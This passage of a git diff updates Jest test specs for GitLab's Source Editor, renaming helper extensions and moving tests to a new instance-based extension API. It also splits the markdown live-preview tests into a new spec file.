oldLineDecorations; - SourceEditorExtension.highlightLines(instance, [7, 10]); + instance.highlightLines([7, 10]); expect(decorationsSpy).toHaveBeenCalledWith(oldLineDecorations, newLineDecorations); }); }); @@ -228,13 +168,18 @@ describe('The basis for an Source Editor extension', () => { options: { isWholeLine: true, className: 'active-line-text' }, }, ]; - const instance = { - deltaDecorations: decorationsSpy, - lineDecorations, - }; + let instance; + + beforeEach(() => { + instance = createInstance({ + deltaDecorations: decorationsSpy, + lineDecorations, + }); + instance.use({ definition: SourceEditorExtension }); + }); it('removes all existing decorations', () => { - SourceEditorExtension.removeHighlights(instance); + instance.removeHighlights(); expect(decorationsSpy).toHaveBeenCalledWith(lineDecorations, []); }); }); @@ -261,9 +206,9 @@ describe('The basis for an Source Editor extension', () => { }); it.each` - desc | eventTrigger | shouldRemove - ${'does not remove the line decorations if the event is triggered on a wrong node'} | ${null} | ${false} - ${'removes existing line decorations when clicking a line number'} | ${'.link-anchor'} | ${true} + desc | eventTrigger | shouldRemove + ${'does not remove the line decorations if the event is triggered on a wrong node'} | ${null} | ${false} + ${'removes existing line decorations when clicking a line number'} | ${`.${EXTENSION_BASE_LINE_LINK_ANCHOR_CLASS}`} | ${true} `('$desc', ({ eventTrigger, shouldRemove } = {}) => { event = generateEventMock({ el: eventTrigger ? document.querySelector(eventTrigger) : null }); instance.onMouseDown.mockImplementation((fn) => { diff --git a/spec/frontend/editor/source_editor_extension_spec.js b/spec/frontend/editor/source_editor_extension_spec.js index 6f2eb07a043..c5fa795f3b7 100644 --- a/spec/frontend/editor/source_editor_extension_spec.js +++ b/spec/frontend/editor/source_editor_extension_spec.js @@ -22,15 +22,15 @@ describe('Editor Extension', () => { it.each` definition | setupOptions | expectedName - ${helpers.MyClassExtension} | ${undefined} | ${'MyClassExtension'} - ${helpers.MyClassExtension} | ${{}} | ${'MyClassExtension'} - ${helpers.MyClassExtension} | ${dummyObj} | ${'MyClassExtension'} - ${helpers.MyFnExtension} | ${undefined} | ${'MyFnExtension'} - ${helpers.MyFnExtension} | ${{}} | ${'MyFnExtension'} - ${helpers.MyFnExtension} | ${dummyObj} | ${'MyFnExtension'} - ${helpers.MyConstExt} | ${undefined} | ${'MyConstExt'} - ${helpers.MyConstExt} | ${{}} | ${'MyConstExt'} - ${helpers.MyConstExt} | ${dummyObj} | ${'MyConstExt'} + ${helpers.SEClassExtension} | ${undefined} | ${'SEClassExtension'} + ${helpers.SEClassExtension} | ${{}} | ${'SEClassExtension'} + ${helpers.SEClassExtension} | ${dummyObj} | ${'SEClassExtension'} + ${helpers.SEFnExtension} | ${undefined} | ${'SEFnExtension'} + ${helpers.SEFnExtension} | ${{}} | ${'SEFnExtension'} + ${helpers.SEFnExtension} | ${dummyObj} | ${'SEFnExtension'} + ${helpers.SEConstExt} | ${undefined} | ${'SEConstExt'} + ${helpers.SEConstExt} | ${{}} | ${'SEConstExt'} + ${helpers.SEConstExt} | ${dummyObj} | ${'SEConstExt'} `( 'correctly creates extension for definition = $definition and setupOptions = $setupOptions', ({ definition, setupOptions, expectedName }) => { @@ -40,7 +40,7 @@ describe('Editor Extension', () => { expect(extension).toEqual( expect.objectContaining({ - name: expectedName, + extensionName: expectedName, setupOptions, }), ); @@ -51,9 +51,9 @@ describe('Editor Extension', () => { describe('api', () => { it.each` definition | expectedKeys - ${helpers.MyClassExtension} | ${['shared', 'classExtMethod']} - ${helpers.MyFnExtension} | ${['fnExtMethod']} - ${helpers.MyConstExt} | ${['constExtMethod']} + ${helpers.SEClassExtension} | ${['shared', 'classExtMethod']} + ${helpers.SEFnExtension} | ${['fnExtMethod']} + ${helpers.SEConstExt} | ${['constExtMethod']} `('correctly returns API for $definition', ({ definition, expectedKeys }) => { const extension = new EditorExtension({ definition }); const expectedApi = Object.fromEntries( diff --git a/spec/frontend/editor/source_editor_instance_spec.js b/spec/frontend/editor/source_editor_instance_spec.js index 87b20a4ba73..f9518743ef8 100644 --- a/spec/frontend/editor/source_editor_instance_spec.js +++ b/spec/frontend/editor/source_editor_instance_spec.js @@ -6,31 +6,43 @@ import { EDITOR_EXTENSION_NOT_REGISTERED_ERROR, EDITOR_EXTENSION_NOT_SPECIFIED_FOR_UNUSE_ERROR, } from '~/editor/constants'; -import Instance from '~/editor/source_editor_instance'; +import SourceEditorInstance from '~/editor/source_editor_instance'; import { sprintf } from '~/locale'; -import { MyClassExtension, conflictingExtensions, MyFnExtension, MyConstExt } from './helpers'; +import { + SEClassExtension, + conflictingExtensions, + SEFnExtension, + SEConstExt, + SEWithSetupExt, +} from './helpers'; describe('Source Editor Instance', () => { let seInstance; const defSetupOptions = { foo: 'bar' }; const fullExtensionsArray = [ - { definition: MyClassExtension }, - { definition: MyFnExtension }, - { definition: MyConstExt }, + { definition: SEClassExtension }, + { definition: SEFnExtension }, + { definition: SEConstExt }, ]; const fullExtensionsArrayWithOptions = [ - { definition: MyClassExtension, setupOptions: defSetupOptions }, - { definition: MyFnExtension, setupOptions: defSetupOptions }, - { definition: MyConstExt, setupOptions: defSetupOptions }, + { definition: SEClassExtension, setupOptions: defSetupOptions }, + { definition: SEFnExtension, setupOptions: defSetupOptions }, + { definition: SEConstExt, setupOptions: defSetupOptions }, ]; const fooFn = jest.fn(); + const fooProp = 'foo'; class DummyExt { // eslint-disable-next-line class-methods-use-this + get extensionName() { + return 'DummyExt'; + } + // eslint-disable-next-line class-methods-use-this provides() { return { fooFn, + fooProp, }; } } @@ -40,26 +52,26 @@ describe('Source Editor Instance', () => { }); it('sets up the registry for the methods coming from extensions', () => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); expect(seInstance.methods).toBeDefined(); - seInstance.use({ definition: MyClassExtension }); + seInstance.use({ definition: SEClassExtension }); expect(seInstance.methods).toEqual({ - shared: 'MyClassExtension', - classExtMethod: 'MyClassExtension', + shared: 'SEClassExtension', + classExtMethod: 'SEClassExtension', }); - seInstance.use({ definition: MyFnExtension }); + seInstance.use({ definition: SEFnExtension }); expect(seInstance.methods).toEqual({ - shared: 'MyClassExtension', - classExtMethod: 'MyClassExtension', - fnExtMethod: 'MyFnExtension', + shared: 'SEClassExtension', + classExtMethod: 'SEClassExtension', + fnExtMethod: 'SEFnExtension', }); }); describe('proxy', () => { - it('returns prop from an extension if extension provides it', () => { - seInstance = new Instance(); + it('returns a method from an extension if extension provides it', () => { + seInstance = new SourceEditorInstance(); seInstance.use({ definition: DummyExt }); expect(fooFn).not.toHaveBeenCalled(); @@ -67,20 +79,77 @@ describe('Source Editor Instance', () => { expect(fooFn).toHaveBeenCalled(); }); + it('returns a prop from an extension if extension provides it', () => { + seInstance = new SourceEditorInstance(); + seInstance.use({ definition: DummyExt }); + + expect(seInstance.fooProp).toBe('foo'); + }); + + it.each` + stringPropToPass | objPropToPass | setupOptions + ${undefined} | ${undefined} | ${undefined} + ${'prop'} | ${undefined} | ${undefined} + ${'prop'} | ${[]} | ${undefined} + ${'prop'} | ${{}} | ${undefined} + ${'prop'} | ${{ alpha: 'beta' }} | ${undefined} + ${'prop'} | ${{ alpha: 'beta' }} | ${defSetupOptions} + ${'prop'} | ${undefined} | ${defSetupOptions} + ${undefined} | ${undefined} | ${defSetupOptions} + ${''} | ${{}} | ${defSetupOptions} + `( + 'correctly passes arguments ("$stringPropToPass", "$objPropToPass") and instance (with "$setupOptions" setupOptions) to extension methods', + ({ stringPropToPass, objPropToPass, setupOptions }) => { + seInstance = new SourceEditorInstance(); + seInstance.use({ definition: SEWithSetupExt, setupOptions }); + + const [stringProp, objProp, instance] = seInstance.returnInstanceAndProps( + stringPropToPass, + objPropToPass, + ); + const expectedObjProps = objPropToPass || {}; + + expect(instance).toBe(seInstance); + expect(stringProp).toBe(stringPropToPass); + expect(objProp).toEqual(expectedObjProps); + if (setupOptions) { + Object.keys(setupOptions).forEach((key) => { + expect(instance[key]).toBe(setupOptions[key]); + }); + } + }, + ); + + it('correctly passes instance to the methods even if no additional props have been passed', () => { + seInstance = new SourceEditorInstance(); + seInstance.use({ definition: SEWithSetupExt }); + + const instance = seInstance.returnInstance(); + + expect(instance).toBe(seInstance); + }); + + it("correctly sets the context of the 'this' keyword for the extension's methods", () => { + seInstance = new SourceEditorInstance(); + const extension = seInstance.use({ definition: SEWithSetupExt }); + + expect(seInstance.giveMeContext()).toEqual(extension.obj); + }); + it('returns props from SE instance itself if no extension provides the prop', () => { - seInstance = new Instance({ + seInstance = new SourceEditorInstance({ use: fooFn, }); - jest.spyOn(seInstance, 'use').mockImplementation(() => {}); - expect(seInstance.use).not.toHaveBeenCalled(); + const spy = jest.spyOn(seInstance.constructor.prototype, 'use').mockImplementation(() => {}); + expect(spy).not.toHaveBeenCalled(); expect(fooFn).not.toHaveBeenCalled(); seInstance.use(); - expect(seInstance.use).toHaveBeenCalled(); + expect(spy).toHaveBeenCalled(); expect(fooFn).not.toHaveBeenCalled(); }); it('returns props from Monaco instance when the prop does not exist on the SE instance', () => { - seInstance = new Instance({ + seInstance = new SourceEditorInstance({ fooFn, }); @@ -92,13 +161,13 @@ describe('Source Editor Instance', () => { describe('public API', () => { it.each(['use', 'unuse'], 'provides "%s" as public method by default', (method) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); expect(seInstance[method]).toBeDefined(); }); describe('use', () => { it('extends the SE instance with methods provided by an extension', () => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); seInstance.use({ definition: DummyExt }); expect(fooFn).not.toHaveBeenCalled(); @@ -108,15 +177,15 @@ describe('Source Editor Instance', () => { it.each` extensions | expectedProps - ${{ definition: MyClassExtension }} | ${['shared', 'classExtMethod']} - ${{ definition: MyFnExtension }} | ${['fnExtMethod']} - ${{ definition: MyConstExt }} | ${['constExtMethod']} + ${{ definition: SEClassExtension }} | ${['shared', 'classExtMethod']} + ${{ definition: SEFnExtension }} | ${['fnExtMethod']} + ${{ definition: SEConstExt }} | ${['constExtMethod']} ${fullExtensionsArray} | ${['shared', 'classExtMethod', 'fnExtMethod', 'constExtMethod']} ${fullExtensionsArrayWithOptions} | ${['shared', 'classExtMethod', 'fnExtMethod', 'constExtMethod']} `( 'Should register $expectedProps when extension is "$extensions"', ({ extensions, expectedProps }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); expect(seInstance.extensionsAPI).toHaveLength(0); seInstance.use(extensions); @@ -127,15 +196,15 @@ describe('Source Editor Instance', () => { it.each` definition | preInstalledExtDefinition | expectedErrorProp - ${conflictingExtensions.WithInstanceExt} | ${MyClassExtension} | ${'use'} + ${conflictingExtensions.WithInstanceExt} | ${SEClassExtension} | ${'use'} ${conflictingExtensions.WithInstanceExt} | ${null} | ${'use'} ${conflictingExtensions.WithAnotherExt} | ${null} | ${undefined} - ${conflictingExtensions.WithAnotherExt} | ${MyClassExtension} | ${'shared'} - ${MyClassExtension} | ${conflictingExtensions.WithAnotherExt} | ${'shared'} + ${conflictingExtensions.WithAnotherExt} | ${SEClassExtension} | ${'shared'} + ${SEClassExtension} | ${conflictingExtensions.WithAnotherExt} | ${'shared'} `( 'logs the naming conflict error when registering $definition', ({ definition, preInstalledExtDefinition, expectedErrorProp }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); jest.spyOn(console, 'error').mockImplementation(() => {}); if (preInstalledExtDefinition) { @@ -175,7 +244,7 @@ describe('Source Editor Instance', () => { `( 'Should throw $thrownError when extension is "$extensions"', ({ extensions, thrownError }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const useExtension = () => { seInstance.use(extensions); }; @@ -188,24 +257,24 @@ describe('Source Editor Instance', () => { beforeEach(() => { extensionStore = new Map(); - seInstance = new Instance({}, extensionStore); + seInstance = new SourceEditorInstance({}, extensionStore); }); it('stores _instances_ of the used extensions in a global registry', () => { - const extension = seInstance.use({ definition: MyClassExtension }); + const extension = seInstance.use({ definition: SEClassExtension }); expect(extensionStore.size).toBe(1); - expect(extensionStore.entries().next().value).toEqual(['MyClassExtension', extension]); + expect(extensionStore.entries().next().value).toEqual(['SEClassExtension', extension]); }); it('does not duplicate entries in the registry', () => { jest.spyOn(extensionStore, 'set'); - const extension1 = seInstance.use({ definition: MyClassExtension }); - seInstance.use({ definition: MyClassExtension }); + const extension1 = seInstance.use({ definition: SEClassExtension }); + seInstance.use({ definition: SEClassExtension }); expect(extensionStore.set).toHaveBeenCalledTimes(1); - expect(extensionStore.set).toHaveBeenCalledWith('MyClassExtension', extension1); + expect(extensionStore.set).toHaveBeenCalledWith('SEClassExtension', extension1); }); it.each` @@ -222,20 +291,20 @@ describe('Source Editor Instance', () => { jest.spyOn(extensionStore, 'set'); const extension1 = seInstance.use({ - definition: MyClassExtension, + definition: SEClassExtension, setupOptions: currentSetupOptions, }); const extension2 = seInstance.use({ - definition: MyClassExtension, + definition: SEClassExtension, setupOptions: newSetupOptions, }); expect(extensionStore.size).toBe(1); expect(extensionStore.set).toHaveBeenCalledTimes(expectedCallTimes); if (expectedCallTimes > 1) { - expect(extensionStore.set).toHaveBeenCalledWith('MyClassExtension', extension2); + expect(extensionStore.set).toHaveBeenCalledWith('SEClassExtension', extension2); } else { - expect(extensionStore.set).toHaveBeenCalledWith('MyClassExtension', extension1); + expect(extensionStore.set).toHaveBeenCalledWith('SEClassExtension', extension1); } }, ); @@ -252,7 +321,7 @@ describe('Source Editor Instance', () => { `( `Should throw "${EDITOR_EXTENSION_NOT_SPECIFIED_FOR_UNUSE_ERROR}" when extension is "$unuseExtension"`, ({ unuseExtension, thrownError }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const unuse = () => { seInstance.unuse(unuseExtension); }; @@ -262,16 +331,16 @@ describe('Source Editor Instance', () => { it.each` initExtensions | unuseExtensionIndex | remainingAPI - ${{ definition: MyClassExtension }} | ${0} | ${[]} - ${{ definition: MyFnExtension }} | ${0} | ${[]} - ${{ definition: MyConstExt }} | ${0} | ${[]} + ${{ definition: SEClassExtension }} | ${0} | ${[]} + ${{ definition: SEFnExtension }} | ${0} | ${[]} + ${{ definition: SEConstExt }} | ${0} | ${[]} ${fullExtensionsArray} | ${0} | ${['fnExtMethod', 'constExtMethod']} ${fullExtensionsArray} | ${1} | ${['shared', 'classExtMethod', 'constExtMethod']} ${fullExtensionsArray} | ${2} | ${['shared', 'classExtMethod', 'fnExtMethod']} `( 'un-registers properties introduced by single extension $unuseExtension', ({ initExtensions, unuseExtensionIndex, remainingAPI }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const extensions = seInstance.use(initExtensions); if (Array.isArray(initExtensions)) { @@ -291,7 +360,7 @@ describe('Source Editor Instance', () => { `( 'un-registers properties introduced by multiple extensions $unuseExtension', ({ unuseExtensionIndex, remainingAPI }) => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const extensions = seInstance.use(fullExtensionsArray); const extensionsToUnuse = extensions.filter((ext, index) => unuseExtensionIndex.includes(index), @@ -304,11 +373,11 @@ describe('Source Editor Instance', () => { it('it does not remove entry from the global registry to keep for potential future re-use', () => { const extensionStore = new Map(); - seInstance = new Instance({}, extensionStore); + seInstance = new SourceEditorInstance({}, extensionStore); const extensions = seInstance.use(fullExtensionsArray); const verifyExpectations = () => { const entries = extensionStore.entries(); - const mockExtensions = ['MyClassExtension', 'MyFnExtension', 'MyConstExt']; + const mockExtensions = ['SEClassExtension', 'SEFnExtension', 'SEConstExt']; expect(extensionStore.size).toBe(mockExtensions.length); mockExtensions.forEach((ext, index) => { expect(entries.next().value).toEqual([ext, extensions[index]]); @@ -326,7 +395,7 @@ describe('Source Editor Instance', () => { beforeEach(() => { instanceModel = monacoEditor.createModel(''); - seInstance = new Instance({ + seInstance = new SourceEditorInstance({ getModel: () => instanceModel, }); }); @@ -363,17 +432,17 @@ describe('Source Editor Instance', () => { }; it('passes correct arguments to callback fns when using an extension', () => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); seInstance.use({ definition: MyFullExtWithCallbacks, setupOptions: defSetupOptions, }); - expect(onSetup).toHaveBeenCalledWith(defSetupOptions, seInstance); + expect(onSetup).toHaveBeenCalledWith(seInstance, defSetupOptions); expect(onUse).toHaveBeenCalledWith(seInstance); }); it('passes correct arguments to callback fns when un-using an extension', () => { - seInstance = new Instance(); + seInstance = new SourceEditorInstance(); const extension = seInstance.use({ definition: MyFullExtWithCallbacks, setupOptions: defSetupOptions, diff --git a/spec/frontend/editor/source_editor_markdown_ext_spec.js b/spec/frontend/editor/source_editor_markdown_ext_spec.js index 245c6c28d31..eecd23bff6e 100644 --- a/spec/frontend/editor/source_editor_markdown_ext_spec.js +++ b/spec/frontend/editor/source_editor_markdown_ext_spec.js @@ -1,36 +1,19 @@ import MockAdapter from 'axios-mock-adapter'; -import { Range, Position, editor as monacoEditor } from 'monaco-editor'; -import waitForPromises from 'helpers/wait_for_promises'; -import { - EXTENSION_MARKDOWN_PREVIEW_PANEL_CLASS, - EXTENSION_MARKDOWN_PREVIEW_ACTION_ID, - EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH, - EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS, - EXTENSION_MARKDOWN_PREVIEW_UPDATE_DELAY, -} from '~/editor/constants'; +import { Range, Position } from 'monaco-editor'; import { EditorMarkdownExtension } from '~/editor/extensions/source_editor_markdown_ext'; import SourceEditor from '~/editor/source_editor'; -import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; -import syntaxHighlight from '~/syntax_highlight'; - -jest.mock('~/syntax_highlight'); -jest.mock('~/flash'); describe('Markdown Extension for Source Editor', () => { let editor; let instance; let editorEl; - let panelSpy; let mockAxios; - const previewMarkdownPath = '/gitlab/fooGroup/barProj/preview_markdown'; const firstLine = 'This is a'; const secondLine = 'multiline'; const thirdLine = 'string with some **markup**'; const text = `${firstLine}\n${secondLine}\n${thirdLine}`; - const plaintextPath = 'foo.txt'; const markdownPath = 'foo.md'; - const responseData = '<div>FooBar</div>'; const setSelection = (startLineNumber = 1, startColumn = 1, endLineNumber = 1, endColumn = 1) => { const selection = new Range(startLineNumber, startColumn, endLineNumber, endColumn); @@ -42,11 +25,6 @@ describe('Markdown Extension for Source Editor', () => { const selectionToString = () => instance.getSelection().toString(); const positionToString = () => instance.getPosition().toString(); - const togglePreview = async () => { - instance.togglePreview(); - await waitForPromises(); - }; - beforeEach(() => { mockAxios = new MockAdapter(axios); setFixtures('<div id="editor" data-editor-loading></div>'); @@ -57,8 +35,7 @@ describe('Markdown Extension for Source Editor', () => { blobPath: markdownPath, blobContent: text, }); - editor.use(new EditorMarkdownExtension({ instance, previewMarkdownPath })); - panelSpy = jest.spyOn(EditorMarkdownExtension, 'togglePreviewPanel'); + instance.use({ definition: EditorMarkdownExtension }); }); afterEach(() => { @@ -67,345 +44,6 @@ describe('Markdown Extension for Source Editor', () => { mockAxios.restore(); }); - it('sets up the instance', () => { - expect(instance.preview).toEqual({ - el: undefined, - action: expect.any(Object), - shown: false, - modelChangeListener: undefined, - }); - expect(instance.previewMarkdownPath).toBe(previewMarkdownPath); - }); - - describe('model language changes listener', () => { - let cleanupSpy; - let actionSpy; - - beforeEach(async () => { - cleanupSpy = jest.spyOn(instance, 'cleanup'); - actionSpy = jest.spyOn(instance, 'setupPreviewAction'); - await togglePreview(); - }); - - it('cleans up when switching away from markdown', () => { - expect(instance.cleanup).not.toHaveBeenCalled(); - expect(instance.setupPreviewAction).not.toHaveBeenCalled(); - - instance.updateModelLanguage(plaintextPath); - - expect(cleanupSpy).toHaveBeenCalled(); - expect(actionSpy).not.toHaveBeenCalled(); - }); - - it.each` - oldLanguage | newLanguage | setupCalledTimes - ${'plaintext'} | ${'markdown'} | ${1} - ${'markdown'} | ${'markdown'} | ${0} - ${'markdown'} | ${'plaintext'} | ${0} - ${'markdown'} | ${undefined} | ${0} - ${undefined} | ${'markdown'} | ${1} - `( - 'correctly handles re-enabling of the action when switching from $oldLanguage to $newLanguage', - ({ oldLanguage, newLanguage, setupCalledTimes } = {}) => { - expect(actionSpy).not.toHaveBeenCalled(); - instance.updateModelLanguage(oldLanguage); - instance.updateModelLanguage(newLanguage); - expect(actionSpy).toHaveBeenCalledTimes(setupCalledTimes); - }, - ); - }); - - describe('model change listener', () => { - let cleanupSpy; - let actionSpy; - - beforeEach(() => { - cleanupSpy = jest.spyOn(instance, 'cleanup'); - actionSpy = jest.spyOn(instance, 'setupPreviewAction'); - instance.togglePreview(); - }); - - afterEach(() => { - jest.clearAllMocks(); - }); - - it('does not do anything if there is no model', () => { - instance.setModel(null); - - expect(cleanupSpy).not.toHaveBeenCalled(); - expect(actionSpy).not.toHaveBeenCalled(); - }); - - it('cleans up the preview when the model changes', () => { - instance.setModel(monacoEditor.createModel('foo')); - expect(cleanupSpy).toHaveBeenCalled(); - }); - - it.each` - language | setupCalledTimes - ${'markdown'} | ${1} - ${'plaintext'} | ${0} - ${undefined} | ${0} - `( - 'correctly handles actions when the new model is $language', - ({ language, setupCalledTimes } = {}) => { - instance.setModel(monacoEditor.createModel('foo', language)); - - expect(actionSpy).toHaveBeenCalledTimes(setupCalledTimes); - }, - ); - }); - - describe('cleanup', () => { - beforeEach(async () => { - mockAxios.onPost().reply(200, { body: responseData }); - await togglePreview(); - }); - - it('disposes the modelChange listener and does not fetch preview on content changes', () => { - expect(instance.preview.modelChangeListener).toBeDefined(); - jest.spyOn(instance, 'fetchPreview'); - - instance.cleanup(); - instance.setValue('Foo Bar'); - jest.advanceTimersByTime(EXTENSION_MARKDOWN_PREVIEW_UPDATE_DELAY); - - expect(instance.fetchPreview).not.toHaveBeenCalled(); - }); - - it('removes the contextual menu action', () => { - expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBeDefined(); - - instance.cleanup(); - - expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBe(null); - }); - - it('toggles the `shown` flag', () => { - expect(instance.preview.shown).toBe(true); - instance.cleanup(); - expect(instance.preview.shown).toBe(false); - }); - - it('toggles the panel only if the preview is visible', () => { - const { el: previewEl } = instance.preview; - const parentEl = previewEl.parentElement; - - expect(previewEl).toBeVisible(); - expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe(true); - - instance.cleanup(); - expect(previewEl).toBeHidden(); - expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - false, - ); - - instance.cleanup(); - expect(previewEl).toBeHidden(); - expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - false, - ); - }); - - it('toggles the layout only if the preview is visible', () => { - const { width } = instance.getLayoutInfo(); - - expect(instance.preview.shown).toBe(true); - - instance.cleanup(); - - const { width: newWidth } = instance.getLayoutInfo(); - expect(newWidth === width / EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH).toBe(true); - - instance.cleanup(); - expect(newWidth === width / EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH).toBe(true); - }); - }); - - describe('fetchPreview', () => { - const fetchPreview = async () => { - instance.fetchPreview(); - await waitForPromises(); - }; - - let previewMarkdownSpy; - - beforeEach(() => { - previewMarkdownSpy = jest.fn().mockImplementation(() => [200, { body: responseData }]); - mockAxios.onPost(previewMarkdownPath).replyOnce((req) => previewMarkdownSpy(req)); - }); - - it('correctly fetches preview based on previewMarkdownPath', async () => { - await fetchPreview(); - - expect(previewMarkdownSpy).toHaveBeenCalledWith( - expect.objectContaining({ data: JSON.stringify({ text }) }), - ); - }); - - it('puts the fetched content into the preview DOM element', async () => { - instance.preview.el = editorEl.parentElement; - await fetchPreview(); - expect(instance.preview.el.innerHTML).toEqual(responseData); - }); - - it('applies syntax highlighting to the preview content', async () => { - instance.preview.el = editorEl.parentElement; - await fetchPreview(); - expect(syntaxHighlight).toHaveBeenCalled(); - }); - - it('catches the errors when fetching the preview', async () => { - mockAxios.onPost().reply(500); - - await fetchPreview(); - expect(createFlash).toHaveBeenCalled(); - }); - }); - - describe('setupPreviewAction', () => { - it('adds the contextual menu action', () => { - expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBeDefined(); - }); - - it('does not set up action if one already exists', () => { - jest.spyOn(instance, 'addAction').mockImplementation(); - - instance.setupPreviewAction(); - expect(instance.addAction).not.toHaveBeenCalled(); - }); - - it('toggles preview when the action is triggered', () => { - jest.spyOn(instance, 'togglePreview').mockImplementation(); - - expect(instance.togglePreview).not.toHaveBeenCalled(); - - const action = instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID); - action.run(); - - expect(instance.togglePreview).toHaveBeenCalled(); - }); - }); - - describe('togglePreview', () => { - beforeEach(() => { - mockAxios.onPost().reply(200, { body: responseData }); - }); - - it('toggles preview flag on instance', () => { - expect(instance.preview.shown).toBe(false); - - instance.togglePreview(); - expect(instance.preview.shown).toBe(true); - - instance.togglePreview(); - expect(instance.preview.shown).toBe(false); - }); - - describe('panel DOM element set up', () => { - it('sets up an element to contain the preview and stores it on instance', () => { - expect(instance.preview.el).toBeUndefined(); - - instance.togglePreview(); - - expect(instance.preview.el).toBeDefined(); - expect(instance.preview.el.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_CLASS)).toBe( - true, - ); - }); - - it('re-uses existing preview DOM element on repeated calls', () => { - instance.togglePreview(); - const origPreviewEl = instance.preview.el; - instance.togglePreview(); - - expect(instance.preview.el).toBe(origPreviewEl); - }); - - it('hides the preview DOM element by default', () => { - panelSpy.mockImplementation(); - instance.togglePreview(); - expect(instance.preview.el.style.display).toBe('none'); - }); - }); - - describe('preview layout setup', () => { - it('sets correct preview layout', () => { - jest.spyOn(instance, 'layout'); - const { width, height } = instance.getLayoutInfo(); - - instance.togglePreview(); - - expect(instance.layout).toHaveBeenCalledWith({ - width: width * EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH, - height, - }); - }); - }); - - describe('preview panel', () => { - it('toggles preview CSS class on the editor', () => { - expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - false, - ); - instance.togglePreview(); - expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - true, - ); - instance.togglePreview(); - expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - false, - ); - }); - - it('toggles visibility of the preview DOM element', async () => { - await togglePreview(); - expect(instance.preview.el.style.display).toBe('block'); - await togglePreview(); - expect(instance.preview.el.style.display).toBe('none'); - }); - - describe('hidden preview DOM element', () => { - it('listens to model changes and re-fetches preview', async () => { - expect(mockAxios.history.post).toHaveLength(0); - await togglePreview(); - expect(mockAxios.history.post).toHaveLength(1); - - instance.setValue('New Value'); - await waitForPromises(); - expect(mockAxios.history.post).toHaveLength(2); - }); - - it('stores disposable listener for model changes', async () => { - expect(instance.preview.modelChangeListener).toBeUndefined(); - await togglePreview(); - expect(instance.preview.modelChangeListener).toBeDefined(); - }); - }); - - describe('already visible preview', () => { - beforeEach(async () => { - await togglePreview(); - mockAxios.resetHistory(); - }); - - it('does not re-fetch the preview', () => { - instance.togglePreview(); - expect(mockAxios.history.post).toHaveLength(0); - }); - - it('disposes the model change event listener', () => { - const disposeSpy = jest.fn(); - instance.preview.modelChangeListener = { - dispose: disposeSpy, - }; - instance.togglePreview(); - expect(disposeSpy).toHaveBeenCalled(); - }); - }); - }); - }); - describe('getSelectedText', () => { it('does not fail if there is no selection and returns the empty string', () => { jest.spyOn(instance, 'getSelection'); @@ -525,13 +163,11 @@ describe('Markdown Extension for Source Editor', () => { }); it('does not fail when only `toSelect` is supplied and fetches the text from selection', () => { - jest.spyOn(instance, 'getSelectedText'); const toSelect = 'string'; selectSecondAndThirdLines(); instance.selectWithinSelection(toSelect); - expect(instance.getSelectedText).toHaveBeenCalled(); expect(selectionToString()).toBe(`[3,1 -> 3,${toSelect.length + 1}]`); }); diff --git a/spec/frontend/editor/source_editor_markdown_livepreview_ext_spec.js b/spec/frontend/editor/source_editor_markdown_livepreview_ext_spec.js new file mode 100644 index 00000000000..c8d016e10ac --- /dev/null +++ b/spec/frontend/editor/source_editor_markdown_livepreview_ext_spec.js @@ -0,0 +1,421 @@ +import MockAdapter from 'axios-mock-adapter'; +import { editor as monacoEditor } from 'monaco-editor'; +import waitForPromises from 'helpers/wait_for_promises'; +import { + EXTENSION_MARKDOWN_PREVIEW_PANEL_CLASS, + EXTENSION_MARKDOWN_PREVIEW_ACTION_ID, + EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH, + EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS, + EXTENSION_MARKDOWN_PREVIEW_UPDATE_DELAY, +} from '~/editor/constants'; +import { EditorMarkdownPreviewExtension } from '~/editor/extensions/source_editor_markdown_livepreview_ext'; +import SourceEditor from '~/editor/source_editor'; +import createFlash from '~/flash'; +import axios from '~/lib/utils/axios_utils'; +import syntaxHighlight from '~/syntax_highlight'; +import { spyOnApi } from './helpers'; + +jest.mock('~/syntax_highlight'); +jest.mock('~/flash'); + +describe('Markdown Live Preview Extension for Source Editor', () => { + let editor; + let instance; + let editorEl; + let panelSpy; + let mockAxios; + let extension; + const previewMarkdownPath = '/gitlab/fooGroup/barProj/preview_markdown'; + const firstLine = 'This is a'; + const secondLine = 'multiline'; + const thirdLine = 'string with some **markup**'; + const text = `${firstLine}\n${secondLine}\n${thirdLine}`; + const plaintextPath = 'foo.txt'; + const markdownPath = 'foo.md'; + const responseData = '<div>FooBar</div>'; + + const togglePreview = async () => { + instance.togglePreview(); + await waitForPromises(); + }; + + beforeEach(() => { + mockAxios = new MockAdapter(axios); 